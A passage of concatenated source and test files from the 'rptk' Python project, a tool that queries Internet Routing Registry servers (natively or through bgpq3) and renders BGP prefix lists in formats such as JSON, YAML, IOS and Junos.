if type(e) in skip_errors:
self.log.debug(msg="{}".format(e))
response_length = False
else:
self.log.error(msg="{}".format(e))
raise e
if not response_length:
return
total_rcvd = len(chunk) or 0
chunks.append(chunk)
while total_rcvd <= response_length:
self.log.debug(msg="received {} of {} bytes"
.format(total_rcvd, response_length))
chunk = self._socket.recv(chunk_size)
if chunk == b'':
self.raise_runtime_error(msg="socket connection broken")
chunks.append(chunk)
total_rcvd += len(chunk)
self.log.debug(msg="received {} of {} bytes"
.format(total_rcvd, response_length))
suffix = chunks[-1][-(total_rcvd - response_length):]
chunks[-1] = chunks[-1][:-len(suffix)]
self.log.debug("suffix length: {}".format(len(suffix)))
return ''.join(c.decode() for c in chunks)
def _parse_response(self, response):
"""Check response code and return response data length."""
self.log.debug("received response {}".format(response))
response = response.decode()
match = self._regexp.match(response)
if not match:
self.raise_runtime_error("invalid response '{}'".format(response))
state = match.group('state')
if state == 'A':
length = int(match.group('len'))
self.log.debug(msg="query successful: {} bytes of data"
.format(length))
return length
elif state == 'C':
self.log.debug(msg="query successful. no data.")
return False
elif state == 'D':
raise KeyNotFoundError()
elif state == 'E':
raise KeyNotUniqueError()
elif state == 'F':
if match.group('msg'):
msg = match.group('msg').strip()
else:
msg = 'unknown error'
raise OtherError(msg)
raise RuntimeError("invalid response '{}'".format(response))
def _members(self, obj=None):
"""Resolve an as-set to its members."""
q = "!i{},1".format(obj)
members = self._query(q, skip_errors=(KeyNotFoundError,))
if members:
members = members.split()
self.log.debug("found {} members of {}".format(len(members), obj))
return members
else:
self.log.debug("no members of {} found. treating as autnum."
.format(obj))
return [obj]
def _routes(self, obj=None):
"""Get routes for specified object."""
proto = {
u'ipv4': {'cmd': '!g', 'class': ipaddress.IPv4Network},
u'ipv6': {'cmd': '!6', 'class': ipaddress.IPv6Network}
}
routes = dict()
for af in proto:
cmd = proto[af]['cmd']
cls = proto[af]['class']
q = "{}{}".format(cmd, obj)
routes[af] = list()
resp = self._query(q, skip_errors=(KeyNotFoundError,))
if resp:
for each in resp.split():
try:
routes[af].append(cls(unicode(each)))
except (ipaddress.AddressValueError,
ipaddress.NetmaskValueError):
self.log.warning(msg="converting {} to {} failed"
.format(each, cls))
self.log.debug(msg="found {} {} prefixes for object {}"
.format(len(routes[af]), af, obj))
return routes
class IRRQueryError(RuntimeError):
"""Exception raised during query execution."""
proto_msg = ''
def __init__(self, *args, **kwargs):
"""Initialise the Exception instance."""
super(IRRQueryError, self).__init__(self.proto_msg, *args, **kwargs)
class KeyNotFoundError(IRRQueryError):
"""The RPSL key was not found."""
proto_msg = "Key not found. (D)"
class KeyNotUniqueError(IRRQueryError):
"""There are multiple copies of the key in one database. (E)."""
proto_msg = "There are multiple copies of the key in one database. (E)"
class OtherError(IRRQueryError):
"""An unknown error occured during query execution."""
proto_msg = "Some other error, see the <optional message> for details."
|
wolcomm/rptk
|
test/test_cli.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk CLI test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import re
import sys
from helpers import (objects)
import pytest
args = (
[],
["--debug"],
["--version"],
["--policy=strict", "--query=bgpq3", "--format=yaml"]
)
version_regexp = re.compile(r"^rptk version \d+.\d+.\d(-\w+\.\d+)?$")
@pytest.mark.usefixtures("mock_query_classes")
class TestCLI(object):
"""Test cases for rptk command-line tool."""
@pytest.mark.parametrize("args", args)
@pytest.mark.parametrize("objects", objects())
def test_cli(self, capsys, cli_entry_point, args, objects):
"""Test rptk command-line tool."""
sys.argv[0] = "rptk"
argv = args + list(objects)
try:
cli_entry_point(argv=argv)
except SystemExit as exit:
captured = capsys.readouterr()
assert exit.code == 0
for obj in objects:
if "--version" in args:
assert version_regexp.match(captured.out)
else:
assert obj in captured.out
|
wolcomm/rptk
|
rptk/query/__init__.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query module."""
from __future__ import print_function
from __future__ import unicode_literals
from rptk.base import BaseObject
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
class BaseQuery(BaseObject):
"""Base class for the definition of query execution classes."""
posix_only = False
def __init__(self, **opts):
"""Initialise new object."""
super(BaseQuery, self).__init__()
self.log_init()
self._opts = opts
self.log_init_done()
def query(self, *objects):
"""Check the object name type."""
self.log_method_enter(method=self.current_method)
for obj in objects:
if not isinstance(obj, basestring):
self.raise_type_error(arg=obj, cls=basestring)
obj = unicode(obj)
yield obj
@property
def host(self):
"""Get the configured IRR server hostname."""
return self.opts["host"]
@property
def port(self):
"""Get the configured IRR server port."""
return int(self.opts["port"])
@property
def target(self):
"""Construct a hostname:port pair for the IRR server."""
return "{}:{}".format(self.host, self.port)
|
wolcomm/rptk
|
test/test_web.py
|
<reponame>wolcomm/rptk
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk web-api test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import logging
import re
from helpers import default_format_classes, objects
import pytest
import yaml
try:
from yaml import CLoader as Loader
except ImportError as e:
logging.getLogger(__name__).warning("%s", e, exc_info=True)
from yaml import Loader
server_re = re.compile(r"^rptk-web/\d+.\d+.\d(-\w+\.\d+)?$")
@pytest.mark.usefixtures("mock_query_classes")
class TestWebAPI(object):
"""Test cases for rptk web API."""
def test_get_formats(self, client, validate_schema):
"""Test get_formats method."""
uri = "/formats"
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert server_re.match(resp.headers["Server"])
data = resp.json
assert validate_schema(data, "get_formats.schema")
def test_get_policies(self, client, validate_schema):
"""Test get_policies method."""
uri = "/policies"
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert server_re.match(resp.headers["Server"])
data = resp.json
assert validate_schema(data, "get_policies.schema")
@pytest.mark.parametrize("f", default_format_classes().keys())
@pytest.mark.parametrize("objects", objects())
def test_get_prefix_list(self, client, validate_schema, f, objects):
"""Test get_prefix_list method."""
base_uris = [
"/query?format={}".format(f),
"/{}/query?".format(f)
]
uris = list()
for uri in base_uris:
for obj in objects:
uri += "&objects={}".format(obj)
uris.append(uri)
if len(objects) == 1:
uris.append("/{}/{}".format(f, objects[0]))
print("uris: {}".format(uris))
for uri in uris:
with client() as c:
resp = c.get(uri)
assert resp.status_code == 200
assert server_re.match(resp.headers["Server"])
if f == "json":
assert resp.content_type == "application/json"
data = resp.json
assert validate_schema(data, "get_prefix_list.schema")
elif f == "yaml":
assert resp.content_type == "application/x-yaml"
data = yaml.load(resp.data, Loader=Loader)
assert validate_schema(data, "get_prefix_list.schema")
else:
assert resp.content_type == "text/plain"
for obj in objects:
assert obj in resp.data.decode()
|
wolcomm/rptk
|
rptk/load.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk load module."""
from __future__ import print_function
from __future__ import unicode_literals
import collections
import importlib
from rptk.base import BaseObject
class ClassLoader(BaseObject):
"""ClassLoader to dynamically load query and format classes."""
def __init__(self, items=None):
"""Initialise a new ClassLoader object."""
super(ClassLoader, self).__init__()
self.log_init()
if not isinstance(items, collections.Iterable):
raise TypeError("{} not of type {}"
.format(items, collections.Iterable))
self._classes = dict()
self.log.debug(msg="trying to load classes")
for name, path in items:
mod_path, cls_path = path.rsplit(".", 1)
self.log.debug(msg="loading class {}".format(cls_path))
try:
cls = getattr(importlib.import_module(mod_path), cls_path)
except ImportError as e:
self.log.warning(msg="{}".format(e))
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self._classes.update({name: cls})
self.log.debug(msg="loaded {} classes".format(len(self._classes)))
self.log_init_done()
def get_class(self, name=None):
"""Get the named class."""
return self._classes[name]
@property
def class_names(self):
"""Get a list of avalable class names."""
return [name for name in self._classes]
@property
def classes(self):
"""Get a list of available classes."""
return [self.get_class(name) for name in self.class_names]
@property
def class_info(self):
"""Get a mapping of class names to descriptions."""
info = dict()
for name in self._classes:
descr = None
try:
descr = self.get_class(name=name).description
except AttributeError as e:
self.log.debug(msg="{}".format(e))
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
info.update({name: {
'description': descr
}})
return info
|
wolcomm/rptk
|
rptk/query/bgpq3/_sync.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.bgpq3.sync module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
import subprocess
from rptk.query import BaseQuery
from whichcraft import which
class _Bgpq3QuerySync(BaseQuery):
"""Performs queries using bgpq3."""
posix_only = True
def query(self, *objects):
"""Execute a query."""
objects = super(_Bgpq3QuerySync, self).query(*objects)
if not self.path:
msg = "couldn't determine bgpq3 executable path"
self.log.error(msg=msg)
raise RuntimeError(msg)
try:
policy = self.opts["policy"]
except KeyError:
policy = None
all_cmds = self._construct_cmds(objects=objects, policy=policy)
result = self._run_cmds(all_cmds=all_cmds)
self.log_method_exit(method=self.current_method)
return result
def _construct_cmds(self, objects, policy):
"""Construct bgpq3 command sets for query."""
self.log_method_enter(method=self.current_method)
cmds = dict()
for obj in objects:
self.log.debug(msg="constructing commands for "
"object={}, policy={}".format(obj, policy))
if policy == "loose":
cmds.update({obj: {'ipv4': [self.path, "-h", self.target,
"-l", "ipv4", "-m", "24",
"-r", "8", "-R", "24", "-4Aj",
obj],
'ipv6': [self.path, "-h", self.target,
"-l", "ipv6", "-m", "48",
"-r", "16", "-R", "48", "-6Aj",
obj]}})
else:
cmds.update({obj: {'ipv4': [self.path, "-h", self.target,
"-l", "ipv4", "-m", "24", "-4Aj",
obj],
'ipv6': [self.path, "-h", self.target,
"-l", "ipv6", "-m", "48", "-6Aj",
obj]}})
self.log_method_exit(method=self.current_method)
return cmds
def _run_cmds(self, all_cmds):
"""Spawn bgpq3 subprocesses and return query results."""
self.log_method_enter(method=self.current_method)
result = dict()
for obj, cmds in all_cmds.items():
result[obj] = dict()
for cmd in cmds.values():
self.log.debug(msg="running {}".format(" ".join(cmd)))
output = self._run_cmd(cmd)
result[obj].update(json.loads(output))
self.log_method_exit(method=self.current_method)
return result
def _run_cmd(self, cmd):
"""Spawn a subprocess and return the contents of stdout."""
self.log_method_enter(method=self.current_method)
try:
output = subprocess.check_output(cmd, universal_newlines=True)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
@property
def path(self):
"""Find the path of the bgpq3 executable."""
self.log.debug(msg="determining bgpq3 executable path")
try:
return self.opts["bgpq3_path"]
except KeyError:
self.log.debug(msg="no configured path, using system default")
return which("bgpq3")
|
wolcomm/rptk
|
test/conftest.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Fixtures for rptk test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import ipaddress
import json
import os
import jsonschema
from pkg_resources import load_entry_point
import pytest
@pytest.fixture
def mock_query_classes(monkeypatch):
"""Monkeypatch query classes for testing."""
from rptk import RptkAPI
from rptk.query import BaseQuery
class _MockQuery(BaseQuery):
def query(self, *objects):
objects = super(self.__class__, self).query(*objects)
result = dict()
data_dir = os.path.join(os.path.dirname(__file__), "data")
for obj in objects:
with open(os.path.join(data_dir, "{}.json".format(obj))) as f:
result.update(json.load(f))
return result
for path in RptkAPI.default_query_classes.values():
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
monkeypatch.setattr(mod, cls_name, _MockQuery)
@pytest.fixture(scope="module")
def cli_entry_point():
"""Get the entry point function for the rptk command-line tool."""
return load_entry_point(dist="rptk", group="console_scripts", name="rptk")
@pytest.fixture(scope="module")
def client():
"""Get test http client."""
from rptk.web import app
return app.test_client
@pytest.fixture(scope="session") # noqa: C901
def format_checker():
"""Get a custom format_checker instance."""
format_checker = jsonschema.FormatChecker()
def coerce_to_unicode(value):
try:
value = unicode(value)
except (ValueError, NameError):
pass
return value
@format_checker.checks("ipv4-prefix", raises=ValueError)
def is_ipv4_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv4Network(instance, strict=True)
return True
except Exception:
return False
@format_checker.checks("ipv6-prefix", raises=ValueError)
def is_ipv6_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv6Network(instance, strict=True)
return True
except Exception:
return False
@format_checker.checks("ipv4-address-prefix", raises=ValueError)
def is_ipv4_address_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv4Network(instance, strict=False)
return True
except Exception:
return False
@format_checker.checks("ipv6-address-prefix", raises=ValueError)
def is_ipv6_address_prefix(instance):
instance = coerce_to_unicode(instance)
try:
ipaddress.IPv6Network(instance, strict=False)
return True
except Exception:
return False
return format_checker
@pytest.fixture(scope="session")
def validate_schema(format_checker):
"""Return a callable that will validate data against a schema."""
def _validate(data, schema_file):
schema_dir = os.path.join(os.path.dirname(__file__), "schemas")
with open(os.path.join(schema_dir, schema_file)) as f:
schema = json.load(f)
jsonschema.validate(instance=data, schema=schema,
format_checker=format_checker)
return True
return _validate
@pytest.fixture(scope="session")
def posix():
"""Check whether we are on a POSIX system."""
return os.name == "posix"
|
wolcomm/rptk
|
test/test_loader.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk class loader test cases."""
from __future__ import print_function
from __future__ import unicode_literals
from helpers import default_format_classes, default_query_classes
import pytest
from rptk.base import BaseObject
class_sets = (
default_query_classes().items(),
default_format_classes().items(),
)
class TestClassLoader(object):
"""Test cases for rptk class loader classes."""
@pytest.mark.parametrize("class_set", class_sets)
def test_class_loader(self, class_set):
"""Test rptk class loader."""
from rptk.load import ClassLoader
loader = ClassLoader(items=class_set)
assert isinstance(loader.class_names, list)
for name, path in class_set:
assert name in loader.class_names
assert name in loader.class_info
assert loader.class_info[name]
assert issubclass(loader.get_class(name=name), BaseObject)
assert isinstance(loader.classes, list)
for cls in loader.classes:
assert isinstance(cls, type)
|
wolcomm/rptk
|
rptk/api.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk API module."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
try:
import configparser
except ImportError:
import ConfigParser as configparser # noqa: N813
import os
import sys
from rptk.__meta__ import __version__
from rptk.base import BaseObject
from rptk.load import ClassLoader
class Rptk(BaseObject):
"""rptk API class."""
version = __version__
available_policies = {
"strict": "Permit only prefixes with explicitly registered 'route' or "
"'route6' objects",
"loose": "Permit prefixes shorter than /24 (ipv4) or /48 (ipv6) with "
"a registered covering 'route' or 'route6' object"
}
default_query_classes = {
"native": "rptk.query.native.NativeQuery",
"bgpq3": "rptk.query.bgpq3.Bgpq3Query"
}
default_format_classes = {
"json": "rptk.format.jsonf.JsonFormat",
"yaml": "rptk.format.yamlf.YamlFormat",
"plain": "rptk.format.plain.PlainFormat",
"ios": "rptk.format.ios.IosFormat",
"ios_null": "rptk.format.ios_null.IosNullFormat",
"junos": "rptk.format.junos.JunosFormat",
"bird": "rptk.format.bird.BirdFormat",
}
def __init__(self, config_file=None, **kwargs):
"""Initialise API object."""
super(self.__class__, self).__init__()
self.log_init()
self.log.debug(msg="creating options namespaces")
self._options = {
"query_": argparse.Namespace(host="whois.radb.net", port=43,
policy="strict"),
"format_": argparse.Namespace()
}
self.log.debug(msg="determining config file location")
self._config_file = config_file or self._find_config_file()
if self.config_file:
self.log.debug(msg="reading config file at {}"
.format(self.config_file))
reader = self._read_config()
else:
self.log.debug(msg="no config file provided: using default values")
reader = None
if reader and reader.has_section("query-classes"):
self.log.debug("found 'query-classes' section in config file")
query_classes = reader.items(section="query-classes")
else:
query_classes = self.default_query_classes.items()
if reader and reader.has_section("format-classes"):
self.log.debug("found 'format-classes' section in config file")
format_classes = reader.items(section="format-classes")
else:
format_classes = self.default_format_classes.items()
self.log.debug(msg="getting dynamic class loaders")
self._query_class_loader = ClassLoader(items=query_classes)
self._format_class_loader = ClassLoader(items=format_classes)
if reader:
self.log.debug(msg="setting configuration file options")
if reader.has_option("defaults", "query_class"):
query_class_name = reader.get("defaults", "query_class")
self.log.debug(msg="setting query_class_name = {}"
.format(query_class_name))
self.query_class_name = query_class_name
for key, value in reader.items("query"):
self.log.debug(msg="setting query_{} = {}".format(key, value))
setattr(self.query_options, key, value)
if reader.has_option("defaults", "format_class"):
format_class_name = reader.get("defaults", "format_class")
self.log.debug(msg="setting format_class_name = {}"
.format(format_class_name))
self.format_class_name = format_class_name
for key, value in reader.items("format"):
self.log.debug(msg="setting format_{} = {}".format(key, value))
setattr(self.format_options, key, value)
self.log.debug(msg="updating options with user supplied values")
self.update(**kwargs)
self.log_init_done()
@property
def query_class_loader(self):
"""Get query class loader object."""
return self._query_class_loader
@property
def format_class_loader(self):
"""Get format class loader object."""
return self._format_class_loader
@property
def query_class_name(self):
"""Get configured query class name."""
if "native" in self.query_class_loader.class_names:
default = "native"
else:
default = self.query_class_loader.class_names[0]
return getattr(self, "_query_class_name", default)
@query_class_name.setter
def query_class_name(self, value):
"""Configure query class name."""
if value is None:
try:
del(self._query_class_name)
except AttributeError:
pass
elif value in self.query_class_loader.class_names:
self._query_class_name = value
else:
self.raise_runtime_error(msg="query class '{}' is not loaded"
.format(value))
@property
def format_class_name(self):
"""Get configured format class name."""
if "json" in self.format_class_loader.class_names:
default = "json"
else:
default = self.format_class_loader.class_names[0]
return getattr(self, "_format_class_name", default)
@format_class_name.setter
def format_class_name(self, value):
"""Configure format class name."""
if value is None:
try:
del(self._format_class_name)
except AttributeError:
pass
elif value in self.format_class_loader.class_names:
self._format_class_name = value
else:
self.raise_runtime_error(msg="format class '{}' is not loaded"
.format(value))
@property
def query_class(self):
"""Get the configured query class."""
return self.query_class_loader.get_class(name=self.query_class_name)
@property
def format_class(self):
"""Get the configured format class."""
return self.format_class_loader.get_class(name=self.format_class_name)
@property
def query_options(self):
"""Get query_options."""
return self._options["query_"]
@property
def format_options(self):
"""Get format opts."""
return self._options["format_"]
@staticmethod
def _find_config_file():
"""Search for a config file at default locations."""
dirs = [
os.path.join(os.path.join(sys.prefix, "etc"), "rptk"),
os.path.dirname(os.path.realpath(__file__))
]
for dir in dirs:
path = os.path.join(dir, "rptk.conf")
if os.path.isfile(path):
return path
return None
def _read_config(self):
"""Read the config file."""
self.log_method_enter(method=self.current_method)
reader = configparser.SafeConfigParser()
self.log.debug(
msg="trying to read configuration from file {}"
.format(self.config_file)
)
try:
reader.read(self.config_file)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return reader
@property
def config_file(self):
"""Get config file path."""
return self._config_file
def update(self, **kwargs):
"""Update self.opts from keyword args."""
self.log_method_enter(method=self.current_method)
for key, value in kwargs.items():
for prefix, namespace in self._options.items():
if key.startswith(prefix):
self.log.debug(msg="setting {} = {}".format(key, value))
if key.endswith("_class_name"):
setattr(self, key, value)
else:
setattr(namespace, key.lstrip(prefix), value)
self.log_method_exit(method=self.current_method)
return self
def query(self, *objects):
"""Perform a query and return the formatted output."""
self.log_method_enter(method=self.current_method)
self.log.debug(msg="trying to begin query")
self.log.debug(msg="instantiating {} object with options {}"
.format(self.query_class.__name__,
self.query_options))
with self.query_class(**vars(self.query_options)) as q:
result = q.query(*objects)
self.log_method_exit(method=self.current_method)
return result
def format(self, result=None):
"""Output string representation of result using a format class."""
self.log_method_enter(method=self.current_method)
self.log.debug(msg="trying to format result for output")
self.log.debug(msg="instantiating {} object with options {}"
.format(self.format_class.__name__,
self.format_options))
with self.format_class(**vars(self.format_options)) as f:
output = f.format(result=result)
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
rptk/query/bgpq3/_async.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.query.bgpq3.async module."""
from __future__ import print_function
from __future__ import unicode_literals
import asyncio
import collections
import json
from rptk.query.bgpq3._sync import _Bgpq3QuerySync
class _Bgpq3QueryAsync(_Bgpq3QuerySync):
"""Performs queries using bgpq3."""
def _run_cmds(self, all_cmds):
"""Spawn bgpq3 subprocesses and return query results."""
self.log_method_enter(method=self.current_method)
result = collections.defaultdict(dict)
semaphore = asyncio.Semaphore(value=self.max_concurrency)
loop = asyncio.get_event_loop()
tasks = list()
for obj, cmds in all_cmds.items():
for af, cmd in cmds.items():
tasks.append(self._run_cmd(semaphore, obj, af, cmd))
cmd_results = loop.run_until_complete(asyncio.gather(*tasks))
for obj, af, output in cmd_results:
result[obj].update(json.loads(output))
self.log_method_exit(method=self.current_method)
return dict(result)
async def _run_cmd(self, semaphore, obj, af, cmd): # noqa: E999
"""Spawn a subprocess and return the contents of stdout."""
self.log_method_enter(method=self.current_method)
try:
async with semaphore:
self.log.debug(msg="running {}".format(" ".join(cmd)))
proc = await asyncio.create_subprocess_exec(
*cmd, stdout=asyncio.subprocess.PIPE
)
self.log.debug(msg="started {}".format(" ".join(cmd)))
stdout, stderr = await proc.communicate()
await proc.wait()
self.log.debug(msg="done {}".format(" ".join(cmd)))
output = stdout.decode()
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return (obj, af, output)
@property
def max_concurrency(self):
"""Get the maximum allowed number of simulateously running queries."""
try:
return self.opts["max_concurrency"]
except KeyError:
return 4
|
wolcomm/rptk
|
rptk/command_line.py
|
<filename>rptk/command_line.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk command_line module."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import logging
import sys
from rptk import RptkAPI
def logging_init():
"""Set up logger."""
log = logging.getLogger(__name__)
lh = logging.StreamHandler()
lf = logging.Formatter(
fmt="%(asctime)s %(name)s: %(levelname)s %(message)s"
)
lh.setFormatter(lf)
logging.getLogger().addHandler(lh)
return log
def pre_parse(argv):
"""Parse pre-configuration options."""
parser = argparse.ArgumentParser(add_help=False,
argument_default=argparse.SUPPRESS)
parser.add_argument('--debug', '-d', action='store_true', default=False,
help="print debug logging output")
parser.add_argument('--version', '-v', action='store_true', default=False,
help="print version and exit")
parser.add_argument('--config-file', '-f', type=str,
help="path to configuration file")
args, args_remaining = parser.parse_known_args(argv)
return parser, args, args_remaining
def parse(parser, args_remaining, api):
"""Parse configuration options."""
parser.add_argument('--query', '-Q', dest='query_class_name',
help="query class",
choices=api.query_class_loader.class_names)
parser.add_argument('--format', '-F', dest='format_class_name',
help="format class",
choices=api.format_class_loader.class_names)
parser.add_argument('--policy', '-P', dest='query_policy', type=str,
help="resolution policy",
choices=api.available_policies)
parser.add_argument('--host', '-h', dest='query_host', type=str,
help="irrd host to connect to")
parser.add_argument('--port', '-p', dest='query_port', type=int,
help="irrd service tcp port")
parser.add_argument('--name', '-n', dest='format_name', type=str,
help="prefix-list name (default: object)")
parser.add_argument('query_objects', type=str, nargs="+",
help="rpsl object name")
parser.add_argument('--help', action='help',
help="print usage information and exit")
args = parser.parse_args(args=args_remaining)
return args
def main(argv=sys.argv[1:]):
"""Execute a query."""
# setup logger
log = logging_init()
rc = 2
try:
# get config_file and debug options
log.debug(msg="got args: {}".format(argv))
parser, args, args_remaining = pre_parse(argv)
# set log level
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
log.debug(msg="debug logging started")
else:
logging.getLogger().setLevel(logging.WARNING)
# print version if requested
if args.version:
sys.stdout.write("rptk version {}\n".format(RptkAPI.version))
exit(0)
# set up api with default options
log.debug(msg="creating RptkAPI object")
api = RptkAPI(**vars(args))
log.debug(msg="RptkAPI instance ready")
# parse remaining args and update api options
log.debug(msg="parsing command-line arguments")
args = parse(parser=parser, args_remaining=args_remaining, api=api)
log.debug(msg="updating RptkAPI options")
api.update(**vars(args))
# execute query
log.debug(msg="executing query")
result = api.query(*args.query_objects)
log.debug(msg="got result")
# print formatted result
log.debug(msg="formatting output")
output = api.format(result=result)
log.debug(msg="writing output to stdout")
sys.stdout.write("{}\n".format(output))
rc = 0
except Exception as e: # pragma: no cover
log.error(msg="{}".format(e))
rc = 1
exit(rc)
if __name__ == "__main__":
main()
|
wolcomm/rptk
|
rptk/format/jsonf.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.jsonf module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
from rptk.format import BaseFormat
class JsonFormat(BaseFormat):
"""Renders result object as a JSON document."""
description = "JSON object"
content_type = "application/json"
def format(self, result=None):
"""Render output as JSON."""
self.log_method_enter(method=self.current_method)
super(self.__class__, self).format(result=result)
self.log.debug(msg="creating json output")
try:
output = json.dumps(result, indent=4)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
rptk/base.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk base module."""
from __future__ import print_function
from __future__ import unicode_literals
import inspect
import logging
class BaseObject(object):
"""BaseObject class providing generic logging functionality."""
def __init__(self):
"""Initialise object."""
self._log = logging.getLogger(self.__module__)
def __repr__(self):
"""Provide generic string representation."""
return "{}() object".format(self.cls_name)
def __enter__(self):
"""Log context manager entry."""
self.log_ready_start()
self.log_ready_done()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Log context manager exit."""
self.log_exit_start()
self.log_exit_done()
@property
def opts(self):
"""Get self.opts if it exists."""
return getattr(self, "_opts", None)
@property
def log(self):
"""Get the current logger."""
return self._log
@property
def cls_name(self):
"""Get the class name of self."""
return self.__class__.__name__
@property
def current_method(self):
"""Get the currently executing method name."""
return inspect.currentframe().f_back.f_code.co_name
def log_init(self):
"""Log entry into the __init__ method."""
self.log.debug(msg="initialising {} instance".format(self.cls_name))
def log_init_done(self):
"""Log exit from an __init__ method."""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller == '__init__':
self.log.debug(msg="still initialising {} instance"
.format(self.cls_name))
else:
